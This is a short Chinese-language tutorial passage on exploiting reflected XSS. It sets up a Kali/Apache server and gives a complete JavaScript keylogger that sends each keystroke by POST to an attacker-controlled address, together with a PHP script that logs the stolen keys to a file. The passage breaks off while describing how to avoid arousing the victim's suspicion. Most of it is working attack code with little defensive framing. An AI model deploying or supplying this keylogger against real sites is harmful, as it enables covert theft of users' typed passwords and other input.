XSS
原则上:只要XSS漏洞存在,可以编写任何功能的js脚本
【反射型漏洞利用】
键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上
服务器:kali 客户端
启动apache2服务:service apache2 start
语法:
keylogger.js
1 document.onkeypress = function(evt) {2 evt = evt || window.event3 key = String.fromCharCode(evt.charCode)4 if(key) {5 var http = new XMLHttpRequest();6 var param = encodeURI(key)7 http.open("POST","http://192.168.1.127/keylogger.php",true);8 http.setRequestHeader("Content-type","application/x-www-form-urlencoded");9 http.send("key="+param);10 }11 }12 ~
keylogger.php 【用来接受客户端提交上来的数据】
1 <?php2 $key=$_POST['key'];3 $logfile="keylog.txt";4 $fp = fopen($logfile,"a");5 fwrite($fp,$key);6 fclose($fp);7 >
为避免被引起用户怀疑,可将跳转命